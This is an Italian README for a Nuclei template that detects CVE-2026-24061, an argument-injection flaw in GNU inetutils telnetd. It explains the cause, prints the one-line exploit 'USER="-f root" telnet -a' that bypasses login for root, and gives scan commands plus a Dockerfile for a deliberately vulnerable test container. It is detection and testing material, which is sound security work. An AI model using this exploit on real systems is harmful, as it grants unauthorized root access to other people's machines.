
# Template Nuclei per il rilevamento di CVE-2026-24061, un'iniezione critica di argomenti telnet in GNU inetutils telnetd che consente accesso root non autenticato.
Modello Nuclei per il rilevamento della vulnerabilità CVE-2026-24061 in GNU inetutils telnetd, che consente di ottenere accesso root senza autenticazione.
CVE-2026-24061 è una vulnerabilità critica di argument injection in GNU inetutils telnetd che consente a un attaccante di ottenere una root shell senza conoscere la password.
%U: /usr/bin/login -p -h %h %?u{-f %u}{%U}
Vulnerabilità: La variabile d'ambiente USER viene trasmessa tramite il protocollo telnet (RFC 1572 NEW-ENVIRON) e non viene sanificata prima della sostituzione nel comando.
Sfruttamento: L'attaccante imposta USER="-f root" durante la connessione:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
Il flag -f significa "skip authentication" → root senza password 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Per i test è possibile avviare un container Docker vulnerabile:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Avvio:
# Creare l'immagine
docker build -t vuln-telnetd .
# Avviare
docker run -d -p 2323:23 vuln-telnetd
# Verificare la vulnerabilità
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Questo strumento è destinato esclusivamente a test di sicurezza legali su sistemi per i quali si dispone di esplicita autorizzazione.
L'autore non è responsabile per l'uso improprio di questo modello.
Creato da Mr.Zapi